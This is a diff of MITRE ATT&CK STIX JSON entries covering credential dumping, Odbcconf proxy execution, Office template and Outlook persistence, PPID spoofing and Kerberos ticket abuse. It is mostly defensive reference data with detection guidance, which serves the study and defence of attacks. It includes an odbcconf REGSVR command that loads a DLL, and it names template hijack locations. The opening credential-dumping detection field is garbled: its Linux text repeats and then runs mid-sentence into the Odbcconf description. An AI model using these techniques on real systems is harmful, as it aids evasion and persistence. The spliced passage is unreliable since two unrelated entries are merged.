+ "x_mitre_detection": "### Windows\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.\n\nHash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well. \n\nOn Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.\n\nMonitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like [Mimikatz](https://attack.mitre.org/software/S0002). [PowerShell](https://attack.mitre.org/techniques/T1086) scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\n\nMonitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Also monitor for network protocols (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015)\n\n### Linux\nTo obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path /proc//maps, where the /proc//maps, where the REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\file.dll\"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) \n",
+ "description": "Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) Odbcconf.exe is digitally signed by Microsoft.\n\nAdversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\file.dll\"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) \n",
"name": "Odbcconf",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -17761,32 +18425,40 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T17:01:32.793Z",
+ "modified": "2020-06-20T22:39:00.717Z",
"created": "2020-01-24T15:01:32.917Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_platforms": [
+ "Windows"
],
- "x_mitre_defense_bypassed": [
- "Digital Certificate Validation",
- "Application whitelisting"
- ],
- "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of odbcconf.exe may also be useful in determining the origin and purpose of the DLL being loaded.",
"x_mitre_data_sources": [
"Loaded DLLs",
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of odbcconf.exe may also be useful in determining the origin and purpose of the DLL being loaded.",
+ "x_mitre_defense_bypassed": [
+ "Digital Certificate Validation",
+ "Application control"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
- "id": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Office Application Startup",
- "description": "Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.\n\nA variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)",
+ "created": "2017-12-14T16:46:06.044Z",
+ "modified": "2020-06-25T17:48:09.417Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ }
+ ],
+ "type": "attack-pattern",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -17824,18 +18496,10 @@
"description": "SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "persistence"
- }
- ],
- "modified": "2020-03-26T17:36:16.211Z",
- "created": "2017-12-14T16:46:06.044Z",
+ "description": "Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.\n\nA variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)",
+ "name": "Office Application Startup",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53",
"x_mitre_is_subtechnique": false,
"x_mitre_version": "1.2",
"x_mitre_contributors": [
@@ -17911,7 +18575,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Office Template Macros",
- "description": "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)\n\nOffice Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019) \n\nWord Normal.dotm location:C:\\Users\\\\(username)\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\n\nExcel Personal.xlsb location:C:\\Users\\\\(username)\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB\n\nAdversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019) \n\nAn adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.",
+ "description": "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)\n\nOffice Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019) \n\nWord Normal.dotm location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\n\nExcel Personal.xlsb location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB\n\nAdversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019) \n\nAn adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.",
"id": "attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -17920,25 +18584,25 @@
"phase_name": "persistence"
}
],
- "modified": "2020-03-25T23:49:21.679Z",
+ "modified": "2020-06-25T17:48:08.916Z",
"created": "2019-11-07T20:29:17.788Z",
- "x_mitre_platforms": [
- "Windows",
- "Office 365"
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
],
+ "x_mitre_detection": "Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page) Modification to base templates, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated.(Citation: GlobalDotName Jun 2019)",
"x_mitre_data_sources": [
"Windows Registry",
"Process monitoring",
"Process command-line parameters",
"File monitoring"
],
- "x_mitre_detection": "Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page) Modification to base templates, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated.(Citation: GlobalDotName Jun 2019)",
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true
+ "x_mitre_platforms": [
+ "Windows",
+ "Office 365"
+ ]
},
{
"external_references": [
@@ -17974,10 +18638,16 @@
],
"modified": "2020-03-20T15:27:51.559Z",
"created": "2019-11-07T19:44:04.475Z",
- "x_mitre_platforms": [
- "Windows",
- "Office 365"
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_system_requirements": [
+ "Office 2007, 2010, 2013, and 2016"
],
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
+ ],
+ "x_mitre_detection": "Monitor for the creation of the Office Test Registry key. Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence. Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy)\n\nConsider monitoring Office processes for anomalous DLL loads.",
"x_mitre_data_sources": [
"DLL monitoring",
"Loaded DLLs",
@@ -17986,16 +18656,10 @@
"File monitoring",
"Windows Registry"
],
- "x_mitre_detection": "Monitor for the creation of the Office Test Registry key. Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence. Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy)\n\nConsider monitoring Office processes for anomalous DLL loads.",
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
- ],
- "x_mitre_system_requirements": [
- "Office 2007, 2010, 2013, and 2016"
- ],
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true
+ "x_mitre_platforms": [
+ "Windows",
+ "Office 365"
+ ]
},
{
"external_references": [
@@ -18026,11 +18690,12 @@
],
"modified": "2020-03-26T23:26:10.109Z",
"created": "2020-03-14T22:45:52.963Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)",
"x_mitre_data_sources": [
"Host network interface",
"Netflow/Enclave netflow",
@@ -18038,12 +18703,11 @@
"Packet capture",
"SSL/TLS inspection"
],
- "x_mitre_detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -18084,22 +18748,22 @@
],
"modified": "2020-03-26T17:35:15.823Z",
"created": "2019-11-07T20:06:02.624Z",
- "x_mitre_platforms": [
- "Windows",
- "Office 365"
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
],
+ "x_mitre_detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.",
"x_mitre_data_sources": [
"Mail server",
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.",
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
- ],
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true
+ "x_mitre_platforms": [
+ "Windows",
+ "Office 365"
+ ]
},
{
"external_references": [
@@ -18140,22 +18804,22 @@
],
"modified": "2020-03-26T17:35:51.656Z",
"created": "2019-11-07T20:09:56.536Z",
- "x_mitre_platforms": [
- "Windows",
- "Office 365"
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
],
+ "x_mitre_detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.",
"x_mitre_data_sources": [
"Mail server",
"Process monitoring",
"Process command-line parameters"
],
- "x_mitre_detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.",
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
- ],
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true
+ "x_mitre_platforms": [
+ "Windows",
+ "Office 365"
+ ]
},
{
"external_references": [
@@ -18196,22 +18860,22 @@
],
"modified": "2020-03-26T17:36:15.923Z",
"created": "2019-11-07T20:00:25.560Z",
- "x_mitre_platforms": [
- "Windows",
- "Office 365"
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
],
+ "x_mitre_detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.",
"x_mitre_data_sources": [
"Mail server",
"Process monitoring",
"Process command-line parameters"
],
- "x_mitre_detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.",
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
- ],
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true
+ "x_mitre_platforms": [
+ "Windows",
+ "Office 365"
+ ]
},
{
"id": "attack-pattern--9ddc2534-e91c-4dab-a8f6-43dab81e8142",
@@ -18296,9 +18960,9 @@
"description": "Chester, A. (2017, November 20). Alternative methods of becoming SYSTEM. Retrieved June 4, 2019."
},
{
- "description": "Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags. Retrieved June 4, 2019.",
+ "source_name": "Microsoft Process Creation Flags May 2018",
"url": "https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags",
- "source_name": "Microsoft Process Creation Flags May 2018"
+ "description": "Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags. Retrieved June 4, 2019."
},
{
"description": "Secuirtyinbits . (2019, May 14). Parent PID Spoofing (Stage 2) Ataware Ransomware Part 3. Retrieved June 6, 2019.",
@@ -18311,7 +18975,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Parent PID Spoofing",
- "description": "Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018)\n\nAdversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [VBScript](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)\n\nExplicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)",
+ "description": "Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018)\n\nAdversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)\n\nExplicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)",
"id": "attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -18324,29 +18988,29 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-03-26T21:45:30.415Z",
+ "modified": "2020-04-16T19:37:02.030Z",
"created": "2020-02-18T18:22:41.448Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Wayne Silva, F-Secure Countercept"
],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
+ ],
+ "x_mitre_defense_bypassed": [
+ "Heuristic Detection",
+ "Host forensic analysis"
+ ],
+ "x_mitre_detection": "Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018)\n\nMonitor and analyze API calls to CreateProcess/CreateProcessA, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of CreateProcess/CreateProcessA may also be proceeded by a call to UpdateProcThreadAttribute, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible.",
"x_mitre_data_sources": [
"API monitoring",
"Process monitoring",
"Windows event logs"
],
- "x_mitre_detection": "Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018)\n\nMonitor and analyze API calls to CreateProcess/CreateProcessA, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of CreateProcess/CreateProcessA may also be proceeded by a call to UpdateProcThreadAttribute, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible.",
- "x_mitre_defense_bypassed": [
- "Heuristic Detection",
- "Host forensic analysis"
- ],
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_contributors": [
- "Wayne Silva, Countercept"
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -18412,20 +19076,20 @@
],
"modified": "2020-03-23T16:24:34.766Z",
"created": "2020-01-30T16:36:51.184Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_defense_bypassed": [
+ "System Access Controls"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious.",
+ "x_mitre_data_sources": [
+ "Authentication logs"
],
"x_mitre_contributors": [
"Travis Smith, Tripwire"
],
- "x_mitre_data_sources": [
- "Authentication logs"
- ],
- "x_mitre_detection": "Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious.",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_defense_bypassed": [
- "System Access Controls"
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -18521,24 +19185,24 @@
],
"modified": "2020-03-12T17:03:16.122Z",
"created": "2020-01-30T17:03:43.072Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_defense_bypassed": [
+ "System Access Controls"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_system_requirements": [
+ "Kerberos authentication enabled"
+ ],
+ "x_mitre_detection": "Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.\n\nEvent ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to \"Integrity check on decrypted field failed\" and indicates misuse by a previously invalidated golden ticket.(Citation: CERT-EU Golden Ticket Protection)",
+ "x_mitre_data_sources": [
+ "Authentication logs"
],
"x_mitre_contributors": [
"Vincent Le Toux",
"Ryan Becwar"
],
- "x_mitre_data_sources": [
- "Authentication logs"
- ],
- "x_mitre_detection": "Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.\n\nEvent ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to \"Integrity check on decrypted field failed\" and indicates misuse by a previously invalidated golden ticket.(Citation: CERT-EU Golden Ticket Protection)",
- "x_mitre_system_requirements": [
- "Kerberos authentication enabled"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_defense_bypassed": [
- "System Access Controls"
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -18568,25 +19232,24 @@
"phase_name": "credential-access"
}
],
- "modified": "2020-03-24T20:01:56.911Z",
+ "modified": "2020-07-09T17:01:18.054Z",
"created": "2020-02-11T18:38:56.197Z",
+ "x_mitre_data_sources": [
+ "Authentication logs",
+ "Office 365 account logs"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. Consider focusing efforts on detecting other adversary behavior used to acquire credential materials, such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows",
- "Azure",
"Office 365",
"Azure AD"
- ],
